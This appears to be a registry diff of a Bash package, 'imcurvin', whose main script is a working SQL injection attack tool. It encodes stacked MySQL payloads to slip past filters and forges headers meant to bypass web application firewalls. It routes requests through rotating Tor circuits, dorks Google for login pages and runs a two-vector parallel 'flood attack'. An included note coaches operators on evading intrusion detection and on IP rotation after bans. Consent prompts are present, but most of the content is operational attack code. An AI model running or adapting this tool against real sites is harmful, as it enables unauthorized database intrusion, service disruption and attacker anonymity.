imcurvin 1.1.9__tar.gz
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- imcurvin-1.1.9/Imcurvin/Defiancescan.sh +381 -0
- imcurvin-1.1.9/Imcurvin/Note.txt +40 -0
- imcurvin-1.1.9/Imcurvin/Warning.txt +38 -0
- imcurvin-1.1.9/Imcurvin/__init__.py +0 -0
- imcurvin-1.1.9/Imcurvin/cli.py +21 -0
- imcurvin-1.1.9/Imcurvin/default_scan.sh +52 -0
- imcurvin-1.1.9/Imcurvin/imcurvin.sh +191 -0
- imcurvin-1.1.9/Imcurvin/risk_scan.sh +259 -0
- imcurvin-1.1.9/LICENSE +201 -0
- imcurvin-1.1.9/PKG-INFO +53 -0
- imcurvin-1.1.9/README.md +52 -0
- imcurvin-1.1.9/data/HAHA.txt +40 -0
- imcurvin-1.1.9/data/HAHAnonphp.txt +40 -0
- imcurvin-1.1.9/data/TODO.txt +2 -0
- imcurvin-1.1.9/data/__init__.py +0 -0
- imcurvin-1.1.9/data/gentle.txt +20 -0
- imcurvin-1.1.9/data/nerfdef.txt +40 -0
- imcurvin-1.1.9/data/nonnerfphp.txt +40 -0
- imcurvin-1.1.9/data/nonphp.txt +40 -0
- imcurvin-1.1.9/data/sqli.txt +20 -0
- imcurvin-1.1.9/data/sqli_defiance.txt +40 -0
- imcurvin-1.1.9/data/target_default.txt +30 -0
- imcurvin-1.1.9/data/targets.txt +40 -0
- imcurvin-1.1.9/imcurvin.egg-info/PKG-INFO +53 -0
- imcurvin-1.1.9/imcurvin.egg-info/SOURCES.txt +35 -0
- imcurvin-1.1.9/imcurvin.egg-info/dependency_links.txt +1 -0
- imcurvin-1.1.9/imcurvin.egg-info/entry_points.txt +2 -0
- imcurvin-1.1.9/imcurvin.egg-info/not-zip-safe +1 -0
- imcurvin-1.1.9/imcurvin.egg-info/top_level.txt +4 -0
- imcurvin-1.1.9/setup.cfg +4 -0
- imcurvin-1.1.9/setup.py +63 -0
- imcurvin-1.1.9/tamper/__init__.py +0 -0
- imcurvin-1.1.9/tamper/hungry.sh +121 -0
- imcurvin-1.1.9/validators/__init__.py +1 -0
- imcurvin-1.1.9/validators/ayam.py +21 -0
- imcurvin-1.1.9/validators/defval.py +61 -0
- imcurvin-1.1.9/validators/validate.py +82 -0
|
@@ -0,0 +1,381 @@
|
|
|
1
|
+
#!/bin/bash
|
|
2
|
+
# ImCurvin' v1.2.0
|
|
3
|
+
# Copyright 2026 Skokoo
|
|
4
|
+
# Licensed under the Apache License, Version 2.0
|
|
5
|
+
# WIP
|
|
6
|
+
target_url="$1"
|
|
7
|
+
export DEFIANCE_DIR="$(cd "$(dirname "${BASH_SOURCE}")" && pwd)"
|
|
8
|
+
export ROOT_LOG_FILE="$DEFIANCE_DIR/../targetDef.log"
|
|
9
|
+
|
|
10
|
+
source "$DEFIANCE_DIR/../tamper/hungry.sh"
|
|
11
|
+
# Killing all process related to this thing, since there's 2 vector. No no manual CTRL C.
|
|
12
|
+
eexit() {
|
|
13
|
+
trap - SIGINT SIGTERM EXIT
|
|
14
|
+
echo -e "\n\n\e[0;31m[\e[0m!\e[0;31m]\e[0m Interrupted, process killed. "
|
|
15
|
+
kill -9 -$$ 2>/dev/null
|
|
16
|
+
}
|
|
17
|
+
trap 'eexit' SIGINT
|
|
18
|
+
|
|
19
|
+
if [ -n "$custom_proxy" ]; then
|
|
20
|
+
export TOR_CIRCUITS=("$custom_proxy")
|
|
21
|
+
else
|
|
22
|
+
export TOR_CIRCUITS=(9050 9052 9054 9056 9058 9060)
|
|
23
|
+
fi
|
|
24
|
+
# Random agent Array here.
|
|
25
|
+
export DEFIANCE_UA=(
|
|
26
|
+
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
|
|
27
|
+
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
|
|
28
|
+
"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0"
|
|
29
|
+
"Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Mobile Safari/537.36"
|
|
30
|
+
"Mozilla/5.0 (iPhone; CPU iPhone OS 17_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3 Mobile/15E148 Safari/605.1.15"
|
|
31
|
+
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
|
|
32
|
+
)
|
|
33
|
+
# logo
|
|
34
|
+
print_defiance_logo() {
|
|
35
|
+
echo -e " \e[38;5;18m▄\e[0m"
|
|
36
|
+
echo -e " \e[38;5;18m▄██\e[0m"
|
|
37
|
+
echo -e " \e[38;5;18m▄██\e[38;5;21m█▀\e[0m"
|
|
38
|
+
echo -e " \e[38;5;18m▄██\e[38;5;21m▄██\e[38;5;27m█▀\e[0m"
|
|
39
|
+
echo -e " \e[38;5;18m▄██\e[38;5;21m▄██\e[38;5;27m▄██\e[38;5;39m█▀\e[0m"
|
|
40
|
+
echo -e " \e[38;5;18m▄██\e[38;5;21m▄██\e[38;5;27m▄██\e[38;5;39m▄██\e[38;5;45m█▀\e[0m"
|
|
41
|
+
echo -e " \e[38;5;18m▄██\e[38;5;21m▄██\e[38;5;27m▄██\e[38;5;39m▄██\e[38;5;45m▄██\e[38;5;51m█▀\e[0m"
|
|
42
|
+
echo -e " \e[38;5;18m▄██\e[38;5;21m▄██\e[38;5;27m▄██\e[38;5;39m▄██\e[38;5;45m▄██\e[38;5;51m▄██\e[38;5;15m██\e[0m"
|
|
43
|
+
echo -e " \e[38;5;18m▀██\e[38;5;21m▀██\e[38;5;27m▀██\e[38;5;39m▀██\e[38;5;45m▀██\e[38;5;51m▀██\e[38;5;15m██\e[0m"
|
|
44
|
+
echo -e " \e[38;5;18m▀██\e[38;5;21m▀██\e[38;5;27m▀██\e[38;5;39m▀██\e[38;5;45m▀██\e[38;5;51m█▄\e[0m"
|
|
45
|
+
echo -e " \e[38;5;18m▀██\e[38;5;21m▀██\e[38;5;27m▀██\e[38;5;39m▀██\e[38;5;45m█▄\e[0m"
|
|
46
|
+
echo -e " \e[38;5;18m▀██\e[38;5;21m▀██\e[38;5;27m▀██\e[38;5;39m█▄\e[0m"
|
|
47
|
+
echo -e " \e[38;5;18m▀██\e[38;5;21m▀██\e[38;5;27m█▄\e[0m"
|
|
48
|
+
echo -e " \e[38;5;18m▀██\e[38;5;21m█▄\e[0m"
|
|
49
|
+
echo -e " \e[38;5;18m▀██\e[0m"
|
|
50
|
+
echo -e " \e[38;5;18m▀\e[0m"
|
|
51
|
+
echo -e "\n\e[0;31m[\e[0m!\e[0;37m]\e[0m Defiance mode activated, ImCurlin no longer friendly ;("
|
|
52
|
+
if [ -n "$custom_proxy" ]; then
|
|
53
|
+
echo -e "\e[0;31m[\e[0m!\e[0;37m]\e[0m Routing via $custom_proxy"
|
|
54
|
+
else
|
|
55
|
+
echo -e "\e[0;31m[\e[0m!\e[0;37m]\e[0m MultiCircuit Rotation Enabled. IPs are shifting dynamically per request.!"
|
|
56
|
+
fi
|
|
57
|
+
}
|
|
58
|
+
# HTTP pollution, air pollution.
|
|
59
|
+
# Told waf that this is JSON lol.
|
|
60
|
+
braindamage() {
|
|
61
|
+
local choice=$((RANDOM % 3))
|
|
62
|
+
local cf_ray=$(cat /dev/urandom | tr -dc 'a-f0-9' | fold -w 16 | head -n 1)
|
|
63
|
+
if [[ "$target_url" == *"?"* ]]; then
|
|
64
|
+
case "$choice" in
|
|
65
|
+
0) echo "-H Content-Type:application/json -H X-Forwarded-For:127.0.0.1 -H CF-Connecting-IP:172.67.$((RANDOM % 254 + 1)).$((RANDOM % 254 + 1)) -H CF-RAY:${cf_ray}-CGK" ;;
|
|
66
|
+
1) echo "-H Content-Type:application/json -H CF-Visitor:{\"scheme\":\"https\"}" ;;
|
|
67
|
+
2) echo "-H Content-Type:application/json -H X-WAF-Bypass:True -H CF-IPCountry:US -H True-Client-IP:103.21.244.$((RANDOM % 254 + 1))" ;;
|
|
68
|
+
|
|
69
|
+
esac
|
|
70
|
+
else
|
|
71
|
+
case "$choice" in
|
|
72
|
+
0) echo "-H Content-Type:application/json -H Authorization:Bearer $cf_ray -H X-WAF-Bypass:True -H CF-IPCountry:US" ;;
|
|
73
|
+
1) echo "-H Content-Type:application/json -H X-Requested-With:XMLHttpRequest -H CF-RAY:${cf_ray}-CGK -H True-Client-IP:103.21.244.$((RANDOM % 254 + 1))" ;;
|
|
74
|
+
2) echo "-H Content-Type:application/json -H Cache-Control:no-cache,no-store -H Pragma:no-cache -H X-Forwarded-For:127.0.0.1" ;;
|
|
75
|
+
esac
|
|
76
|
+
fi
|
|
77
|
+
}
|
|
78
|
+
# dork, goofle dorking. I mean google.
|
|
79
|
+
dork() {
|
|
80
|
+
local dom="$1"
|
|
81
|
+
echo -e "[i] Launching Universal Google Dorking..."
|
|
82
|
+
sleep 2
|
|
83
|
+
|
|
84
|
+
local gerbang=${TOR_CIRCUITS[$RANDOM % ${#TOR_CIRCUITS[@]}]}
|
|
85
|
+
if [ -n "$custom_proxy" ]; then local prx="-x $gerbang"; else local prx="--socks5-hostname 127.0.0.1:$gerbang"; fi
|
|
86
|
+
local samaran=${DEFIANCE_UA[$RANDOM % ${#DEFIANCE_UA[@]}]}
|
|
87
|
+
# fork, i mean dork. Search search lofin, i mena login. *mean.
|
|
88
|
+
local q="site:${dom} (intitle:\"login\" inurl:\"login\") OR inurl:search OR inurl:api OR inurl:v1"
|
|
89
|
+
local enc=$(echo -n "$q" | curl -s -o /dev/null -w "%{url_effective}" "http://127.0.0.1" --get --data-urlencode "q=" | cut -d'=' -f2-)
|
|
90
|
+
local raw=$(curl $prx -s -m 10 -A "$samaran" "https://google.com/search?q=${enc}&gbv=1")
|
|
91
|
+
|
|
92
|
+
local -a list
|
|
93
|
+
while read -r line; do
|
|
94
|
+
[[ -n "$line" ]] && list+=("$line")
|
|
95
|
+
done < <(echo "$raw" | grep -oP '(?<=url\?q=)[^&]*' | grep "$dom" | sort -u | head -n 4)
|
|
96
|
+
|
|
97
|
+
if [ ${#list[@]} -eq 0 ]; then
|
|
98
|
+
echo -e "\e[0;33m[-]\e[0m No links found on Google Index."
|
|
99
|
+
return 1
|
|
100
|
+
fi
|
|
101
|
+
|
|
102
|
+
echo -e "\n\e[0;32m[+]\e[0m Top 4 Discovered Targets:"
|
|
103
|
+
for i in "${!list[@]}"; do
|
|
104
|
+
echo -e "[\e[1;34m$((i+1))\e[0m] ${list[$i]}"
|
|
105
|
+
done
|
|
106
|
+
|
|
107
|
+
echo -n -e "\n\e[0;32m[?]\e[0m Select target (1-4) or 's' to skip: "
|
|
108
|
+
read -r -n 1 sel
|
|
109
|
+
echo ""
|
|
110
|
+
|
|
111
|
+
if [[ "$sel" =~ ^[1-4]$ ]]; then
|
|
112
|
+
local idx=$((sel - 1))
|
|
113
|
+
export target_url="${list[$idx]}"
|
|
114
|
+
echo -e "\e[0;32m[+]\e[0m Locked on: \e[1;34m$target_url\e[0m"
|
|
115
|
+
return 0
|
|
116
|
+
else
|
|
117
|
+
echo -e "[i] Proceeding with default input."
|
|
118
|
+
return 2
|
|
119
|
+
fi
|
|
120
|
+
}
|
|
121
|
+
# 1st Vector func.
|
|
122
|
+
vector_sqli_agressor_left() {
|
|
123
|
+
while IFS='|' read -r default_path query_payload || [ -n "$query_payload" ]; do
|
|
124
|
+
[[ -z "$default_path" ]] && continue
|
|
125
|
+
|
|
126
|
+
local random_port=${TOR_CIRCUITS[$RANDOM % ${#TOR_CIRCUITS[@]}]}
|
|
127
|
+
local proxy_flag=""
|
|
128
|
+
if [ -n "$custom_proxy" ]; then
|
|
129
|
+
proxy_flag="-x $random_port --fail"
|
|
130
|
+
else
|
|
131
|
+
proxy_flag="--socks5-hostname 127.0.0.1:$random_port --socks5-gssapi-nec --fail"
|
|
132
|
+
fi
|
|
133
|
+
|
|
134
|
+
local base_ua="${DEFIANCE_UA[$RANDOM % ${#DEFIANCE_UA[@]}]}"
|
|
135
|
+
local random_ua="$base_ua"
|
|
136
|
+
local ua_salt=$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 8 | head -n 1)
|
|
137
|
+
|
|
138
|
+
random_ua="${base_ua} Chrome/$((RANDOM % 10 + 120)).0.$((RANDOM % 999 + 1000)).$((RANDOM % 99)) Safari/537.36 Build/${ua_salt}"
|
|
139
|
+
|
|
140
|
+
local defiance_tamper_path=""
|
|
141
|
+
local final_query=""
|
|
142
|
+
local raw_payload="$query_payload"
|
|
143
|
+
local t2=$(randomcase_engine "$raw_payload")
|
|
144
|
+
local t4=$(space2comment_engine "$t2")
|
|
145
|
+
local hex_xor=$(xor_engine "$t4")
|
|
146
|
+
local b64_payload=$(base64_engine "$hex_xor")
|
|
147
|
+
defiance_tamper_path="'; SET @s=FROM_BASE64('${b64_payload}'); PREPARE stmt FROM @s; EXECUTE stmt;--"
|
|
148
|
+
|
|
149
|
+
|
|
150
|
+
if [[ "$WORDLIST_MYSQL" == *"nonphp"* || "$WORDLIST_MYSQL" == *"HAHA"* ]]; then
|
|
151
|
+
final_query="${default_path}${defiance_tamper_path}"
|
|
152
|
+
else
|
|
153
|
+
if [[ "$defiance_tamper_path" == *"="* ]]; then
|
|
154
|
+
local param_name=$(echo "$defiance_tamper_path" | cut -d'=' -f1)
|
|
155
|
+
local param_val=$(echo "$defiance_tamper_path" | cut -d'=' -f2-)
|
|
156
|
+
final_query="${default_path}${param_name}=999&${param_name}=${param_val}${query_payload}"
|
|
157
|
+
else
|
|
158
|
+
final_query="${default_path}${defiance_tamper_path}"
|
|
159
|
+
fi
|
|
160
|
+
fi
|
|
161
|
+
|
|
162
|
+
local waf_trick=$(braindamage)
|
|
163
|
+
echo -e "\e[0;33m[\e[0m!\e[0;34m+]\e[0m Vector 1 [Port:$random_port] Probing Latency on: \e[38;5;236m${target_url}${final_query}\e[0m"
|
|
164
|
+
local curl_output=$(curl $proxy_flag $waf_trick -m 12 -A "$random_ua" -s -o /dev/null -w "%{time_total}|%{http_code}" "${target_url}${final_query}")
|
|
165
|
+
local stopwatch=$(echo "$curl_output" | cut -d'|' -f1)
|
|
166
|
+
local http_status=$(echo "$curl_output" | cut -d'|' -f2)
|
|
167
|
+
|
|
168
|
+
if [[ "$http_status" == "403" || "$http_status" == "429" ]]; then
|
|
169
|
+
echo -e " \e[0;33m[!]\e[0m Port $random_port Shadowbanned (HTTP $http_status). Rotating TOR IP Circuit..."
|
|
170
|
+
(echo "AUTHENTICATE \"\""; echo "SIGNAL NEWNYM"; echo "QUIT") | nc 127.0.0.1 9051 >/dev/null 2>&1
|
|
171
|
+
sleep 1
|
|
172
|
+
fi
|
|
173
|
+
|
|
174
|
+
if [[ -n "$stopwatch" && "$stopwatch" != "0.000000" ]]; then
|
|
175
|
+
if (( $(echo "$stopwatch > 4.0" | bc -l) )); then
|
|
176
|
+
echo -e "\e[0;31m[!+!]\e[0m Vector 1 confirmed MySQL Anomaly: ${stopwatch}s"
|
|
177
|
+
echo "SQLI_ALERT|$default_path|$query_payload" >> "$ROOT_LOG_FILE"
|
|
178
|
+
fi
|
|
179
|
+
fi
|
|
180
|
+
|
|
181
|
+
sleep $((RANDOM % 6 + 4))
|
|
182
|
+
done < <(shuf "$WORDLIST_MYSQL")
|
|
183
|
+
}
|
|
184
|
+
vector_sqli_agressor_right() {
|
|
185
|
+
while IFS='|' read -r default_path query_payload || [ -n "$query_payload" ]; do
|
|
186
|
+
[[ -z "$default_path" ]] && continue
|
|
187
|
+
|
|
188
|
+
local random_port=${TOR_CIRCUITS[$RANDOM % ${#TOR_CIRCUITS[@]}]}
|
|
189
|
+
local proxy_flag=""
|
|
190
|
+
if [ -n "$custom_proxy" ]; then
|
|
191
|
+
proxy_flag="-x $random_port --fail"
|
|
192
|
+
else
|
|
193
|
+
proxy_flag="--socks5-hostname 127.0.0.1:$random_port --socks5-gssapi-nec --fail"
|
|
194
|
+
fi
|
|
195
|
+
|
|
196
|
+
local base_ua="${DEFIANCE_UA[$RANDOM % ${#DEFIANCE_UA[@]}]}"
|
|
197
|
+
local random_ua="$base_ua"
|
|
198
|
+
local ua_salt=$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 8 | head -n 1)
|
|
199
|
+
|
|
200
|
+
random_ua="${base_ua} Chrome/$((RANDOM % 10 + 120)).0.$((RANDOM % 999 + 1000)).$((RANDOM % 99)) Safari/537.36 Build/${ua_salt}"
|
|
201
|
+
|
|
202
|
+
local defiance_tamper_path=""
|
|
203
|
+
local final_query=""
|
|
204
|
+
local raw_payload="$query_payload"
|
|
205
|
+
local t2=$(randomcase_engine "$raw_payload")
|
|
206
|
+
local t4=$(space2comment_engine "$t2")
|
|
207
|
+
local hex_xor=$(xor_engine "$t4")
|
|
208
|
+
local b64_payload=$(base64_engine "$hex_xor")
|
|
209
|
+
defiance_tamper_path="'; SET @s=FROM_BASE64('${b64_payload}'); PREPARE stmt FROM @s; EXECUTE stmt;--"
|
|
210
|
+
|
|
211
|
+
if [[ "$WORDLIST_MYSQL" == *"nonphp"* || "$WORDLIST_MYSQL" == *"HAHA"* ]]; then
|
|
212
|
+
final_query="${default_path}${defiance_tamper_path}"
|
|
213
|
+
else
|
|
214
|
+
if [[ "$defiance_tamper_path" == *"="* ]]; then
|
|
215
|
+
local param_name=$(echo "$defiance_tamper_path" | cut -d'=' -f1)
|
|
216
|
+
local param_val=$(echo "$defiance_tamper_path" | cut -d'=' -f2-)
|
|
217
|
+
final_query="${default_path}${param_name}=999&${param_name}=${param_val}${query_payload}"
|
|
218
|
+
else
|
|
219
|
+
final_query="${default_path}${defiance_tamper_path}"
|
|
220
|
+
fi
|
|
221
|
+
fi
|
|
222
|
+
local waf_trick=$(braindamage)
|
|
223
|
+
|
|
224
|
+
echo -e "\e[0;33m[\e[0m!\e[0;34m+]\e[0m Vector 2 [Port:$random_port] Probing Latency on: \e[38;5;236m${target_url}${final_query}\e[0m"
|
|
225
|
+
|
|
226
|
+
local curl_output=$(curl $proxy_flag $waf_trick -m 12 -A "$random_ua" -s -o /dev/null -w "%{time_total}|%{http_code}" "${target_url}${final_query}")
|
|
227
|
+
|
|
228
|
+
local stopwatch=$(echo "$curl_output" | cut -d'|' -f1)
|
|
229
|
+
local http_status=$(echo "$curl_output" | cut -d'|' -f2)
|
|
230
|
+
|
|
231
|
+
if [[ "$http_status" == "403" || "$http_status" == "429" ]]; then
|
|
232
|
+
echo -e " \e[0;33m[!]\e[0m Port $random_port Shadowbanned (HTTP $http_status). Rotating TOR IP Circuit..."
|
|
233
|
+
(echo "AUTHENTICATE \"\""; echo "SIGNAL NEWNYM"; echo "QUIT") | nc 127.0.0.1 9051 >/dev/null 2>&1
|
|
234
|
+
sleep 1
|
|
235
|
+
fi
|
|
236
|
+
|
|
237
|
+
if [[ -n "$stopwatch" && "$stopwatch" != "0.000000" ]]; then
|
|
238
|
+
if (( $(echo "$stopwatch > 4.0" | bc -l) )); then
|
|
239
|
+
echo -e "\e[0;31m[!+!]\e[0m Vector 2 confirmed MySQL Anomaly: ${stopwatch}s"
|
|
240
|
+
echo "SQLI_ALERT|$default_path|$query_payload" >> "$ROOT_LOG_FILE"
|
|
241
|
+
fi
|
|
242
|
+
fi
|
|
243
|
+
|
|
244
|
+
sleep $((RANDOM % 6 + 4))
|
|
245
|
+
done < <(shuf "$WORDLIST_MYSQL")
|
|
246
|
+
}
|
|
247
|
+
|
|
248
|
+
clear
|
|
249
|
+
print_defiance_logo
|
|
250
|
+
echo -e "\n\e[0;31m[\e[0m!\e[0;37m]\e[0m \e[1;31mLEGAL WARNING 1/2:\e[0m Defiance Mode fires a multivector parallel network flood."
|
|
251
|
+
echo -e "Executing this mode against unauthorized infrastructures strictly violates cyber laws."
|
|
252
|
+
echo -n -e "\e[0;33m[\e[0m?\e[0;37m]\e[0m Do you have explicit written consent from the target owner? (YES/no): "
|
|
253
|
+
read -r legal_1
|
|
254
|
+
|
|
255
|
+
if [ "$legal_1" != "YES" ]; then
|
|
256
|
+
echo -e "\n\e[0;31m[\e[0m-\e[0;37m]\e[0m Aborted. Unauthorized scanning is strictly illegal."
|
|
257
|
+
exit 1
|
|
258
|
+
fi
|
|
259
|
+
|
|
260
|
+
echo -e "\n\e[0;31m[\e[0m!\e[0;37m]\e[0m \e[1;31mLEGAL WARNING 2/2:\e[0m This tool is NOT server friendly in Defiance Mode."
|
|
261
|
+
echo -e "This action will trigger heavy CPU calculation loads and dynamic Multi IP routing on the target."
|
|
262
|
+
echo -n -e "\e[0;33m[\e[0m?\e[0;37m]\e[0m Type \e[1;33m'I ACCEPT ALL RISKS'\e[0m to proceed with the execution sequence: "
|
|
263
|
+
read -r legal_2
|
|
264
|
+
|
|
265
|
+
if [ "$legal_2" != "I ACCEPT ALL RISKS" ]; then
|
|
266
|
+
echo -e "\n\e[0;31m[\e[0m-\e[0;37m]\e[0m Verification failed. Revert. Operation canceled."
|
|
267
|
+
exit 1
|
|
268
|
+
fi
|
|
269
|
+
if ! command -v xxd &> /dev/null; then
|
|
270
|
+
echo -e "\e[0;33m[\e[0m-\e[0;37m]\e[0m WARNING: 'xxd' is not installed on your terminal."
|
|
271
|
+
echo -e "\e[0;33m[\e[0m-\e[0;37m]\e[0m Please install xxd first before running imCurvin'."
|
|
272
|
+
exit 1
|
|
273
|
+
fi
|
|
274
|
+
if [ -z "$custom_proxy" ]; then
|
|
275
|
+
echo -e "\n\e[0;33m[\e[0m!\e[0;37m]\e[0m Checking for TOR terminal service..."
|
|
276
|
+
|
|
277
|
+
if pgrep -x "tor" >/dev/null 2>&1; then
|
|
278
|
+
|
|
279
|
+
echo -e "\e[0;32m[\e[0m=\e[0;32m]\e[0m Tor terminal service detected as active."
|
|
280
|
+
else
|
|
281
|
+
echo -e "\e[0;33m[\e[0m-\e[0;37m]\e[0m WARNING: Tor terminal service is not detected/running."
|
|
282
|
+
echo -e "\e[0;33m[\e[0m-\e[0;37m]\e[0m Run 'tor' command in a new terminal before using Defiance Mode."
|
|
283
|
+
|
|
284
|
+
echo -e "\e[0;33m[\e[0m-\e[0;37m]\e[0m Operation aborted due to environment mismatch."
|
|
285
|
+
exit 1
|
|
286
|
+
fi
|
|
287
|
+
fi
|
|
288
|
+
|
|
289
|
+
echo -e "\n\e[0;34m[\e[0m*\e[0;37m]\e[0m Tracing target redirections."
|
|
290
|
+
|
|
291
|
+
recon_port=${TOR_CIRCUITS[$RANDOM % ${#TOR_CIRCUITS[@]}]}
|
|
292
|
+
|
|
293
|
+
if [ -n "$custom_proxy" ]; then
|
|
294
|
+
recon_proxy="-x $recon_port";
|
|
295
|
+
else
|
|
296
|
+
|
|
297
|
+
recon_proxy="--socks5-hostname 127.0.0.1:$recon_port";
|
|
298
|
+
fi
|
|
299
|
+
|
|
300
|
+
final_destination_url=$(curl $recon_proxy -s -o /dev/null -w "%{url_effective}" -L "$target_url")
|
|
301
|
+
|
|
302
|
+
export target_url="$final_destination_url"
|
|
303
|
+
|
|
304
|
+
clean_domain=$(echo "$target_url" | sed -e 's|^[^/]*//||' -e 's|/.*||' -e 's|:.*||')
|
|
305
|
+
dork "$clean_domain"
|
|
306
|
+
dork_status=$?
|
|
307
|
+
|
|
308
|
+
if [ -f "$DEFIANCE_DIR/../validators/ayam.py" ]; then
|
|
309
|
+
|
|
310
|
+
echo -e "\n[i] Analyzing paramater.."
|
|
311
|
+
eye_report=$(python "$DEFIANCE_DIR/../validators/ayam.py" "$target_url")
|
|
312
|
+
|
|
313
|
+
param_type=$(echo "$eye_report" | cut -d'|' -f1)
|
|
314
|
+
|
|
315
|
+
if [ "$param_type" = "QUERY_PARAM" ]; then
|
|
316
|
+
|
|
317
|
+
discovered_keys=$(echo "$eye_report" | cut -d'|' -f3)
|
|
318
|
+
echo -e "\e[0;32m[+]\e[0m Active Query Parameters Spotted > ($discovered_keys)"
|
|
319
|
+
|
|
320
|
+
elif [ "$param_type" = "PATH_PARAM" ]; then
|
|
321
|
+
|
|
322
|
+
echo -e "\e[0;32m[+]\e[0m Path/Folder Parameter Spotted."
|
|
323
|
+
else
|
|
324
|
+
echo -e "\e[0;33m[-]\e[0m ayam.py: No parameters detected in the final URL destination."
|
|
325
|
+
fi
|
|
326
|
+
fi
|
|
327
|
+
if [ -n "$custom_wordlist" ] && [ -f "$custom_wordlist" ]; then
|
|
328
|
+
export WORDLIST_MYSQL="$custom_wordlist"
|
|
329
|
+
else
|
|
330
|
+
if [[ "$target_url" != *"?"* ]]; then
|
|
331
|
+
echo -e "\e[0;32m[+]\e[0m Framework Targeting: NonPHP."
|
|
332
|
+
export WORDLIST_MYSQL="$DEFIANCE_DIR/../data/HAHAnonphp.txt"
|
|
333
|
+
else
|
|
334
|
+
echo -e "\e[0;32m[+]\e[0m Targeting: Standard PHP / Query Configuration Engaged."
|
|
335
|
+
export WORDLIST_MYSQL="$DEFIANCE_DIR/../data/HAHA.txt"
|
|
336
|
+
fi
|
|
337
|
+
if [ "$nerf_mode" = "true" ]; then
|
|
338
|
+
if [[ "$target_url" != *"?"* ]]; then
|
|
339
|
+
export WORDLIST_MYSQL="$DEFIANCE_DIR/../data/nonnerfphp.txt"
|
|
340
|
+
else
|
|
341
|
+
export WORDLIST_MYSQL="$DEFIANCE_DIR/../data/nerfdef.txt"
|
|
342
|
+
fi
|
|
343
|
+
fi
|
|
344
|
+
fi
|
|
345
|
+
echo -e "\n\e[0;34m[\e[0m*\e[0;37m]\e[0m Performing database environment verification.."
|
|
346
|
+
|
|
347
|
+
server_fingerprint=$(curl $recon_proxy -m 5 -s -I "$target_url" | grep -Ei "(Server|X-Powered-By|Set-Cookie|X-DDoS|WAF)")
|
|
348
|
+
|
|
349
|
+
if echo "$server_fingerprint" | grep -qEi "(oracle|postgre|mssql|microsoft-iis|supabase)"; then
|
|
350
|
+
echo -e "\n\e[0;31m[\e[0m!\e[0;37m]\e[0m Target rejected, Non MySQL environment fingerprint."
|
|
351
|
+
|
|
352
|
+
echo -e "[i] Footprint: $(echo "$server_fingerprint" | tr '\r\n' ' ')"
|
|
353
|
+
|
|
354
|
+
echo -e "\e[0;33m[\e[0m-\e[0;37m]\e[0m Revert. Operation aborted to prevent structural asset wastage."
|
|
355
|
+
exit 1
|
|
356
|
+
|
|
357
|
+
else
|
|
358
|
+
|
|
359
|
+
echo -e "\e[0;32m[\e[0m+\e[0;37m]\e[0m Target environment matches MySQL compliance directives."
|
|
360
|
+
fi
|
|
361
|
+
sleep 1
|
|
362
|
+
|
|
363
|
+
echo -e "\n\e[0;34m[\e[0mi\e[0;37m]\e[0m Launching dualvector synchronized flood attack against \e[1;34m$target_url\e[0m...\n"
|
|
364
|
+
|
|
365
|
+
vector_sqli_agressor_left &
|
|
366
|
+
pid_vector1=$!
|
|
367
|
+
|
|
368
|
+
vector_sqli_agressor_right &
|
|
369
|
+
pid_vector2=$!
|
|
370
|
+
|
|
371
|
+
wait $pid_vector1 $pid_vector2
|
|
372
|
+
|
|
373
|
+
echo -e "\n\e[0;32m[\e[0m=\e[0;32m]\e[0m Attack sequence completed. Input to Defiance Log Analyst.."
|
|
374
|
+
sleep 1
|
|
375
|
+
if [ -f "$DEFIANCE_DIR/../validators/defval.py" ]; then
|
|
376
|
+
python "$DEFIANCE_DIR/../validators/defval.py"
|
|
377
|
+
else
|
|
378
|
+
echo -e "\e[0;33m[\e[0m-\e[0;37m]\e[0m validators/defval.py not found. Skipping validate."
|
|
379
|
+
fi
|
|
380
|
+
|
|
381
|
+
echo ""
|
|
@@ -0,0 +1,40 @@
|
|
|
1
|
+
NOTE:
|
|
2
|
+
|
|
3
|
+
1. OPERATIONAL NOTE
|
|
4
|
+
Do not be overly ambitious when running this tool.
|
|
5
|
+
|
|
6
|
+
Even though it is equipped with "randomized" User Agents and
|
|
7
|
+
dynamic delay entropy, advanced NextGen WAF's and modern IDSs can still
|
|
8
|
+
detect behavioral anomalies if you are not careful.
|
|
9
|
+
|
|
10
|
+
Please note that in "Risk" Mode, although you are strictly required
|
|
11
|
+
to route your traffic through the TOR SOCKS5 proxy network (or specify your own interface using the -proxy flag), this
|
|
12
|
+
operational setup does not fully eliminate the possibility of your
|
|
13
|
+
connection or exit nodes being actively blocked by good WAF.
|
|
14
|
+
|
|
15
|
+
Operational Safety Rules:
|
|
16
|
+
- Never reduce the built in delay settings.
|
|
17
|
+
- Treat this audit as a tactical puzzle, not a "brute force" race.
|
|
18
|
+
- If your connection drops unexpectedly, your IP has likely been banned.
|
|
19
|
+
Rotate your network interface immediately.
|
|
20
|
+
|
|
21
|
+
2. SYSTEM REQUIREMENTS
|
|
22
|
+
To ensure the script executes flawlessly without throwing runtime errors,
|
|
23
|
+
the user must provide the following baseline environment:
|
|
24
|
+
|
|
25
|
+
- OS: Any operating system with a Linux terminal environment.
|
|
26
|
+
- Network Tool: curl.
|
|
27
|
+
- Proxy Client: tor (Mandatory if you intend to execute "Risk" Mode)
|
|
28
|
+
- Other: Python (Mandatory if you want to validate false positives)
|
|
29
|
+
- Other: coreutils (For shuf)
|
|
30
|
+
- Other: xxd
|
|
31
|
+
|
|
32
|
+
->>
|
|
33
|
+
Copyright 2026 Skokoo
|
|
34
|
+
|
|
35
|
+
Licensed under the Apache License, Version 2.0 (the "License");
|
|
36
|
+
you may not use this file except in compliance with the License.
|
|
37
|
+
You may obtain a copy of the License at
|
|
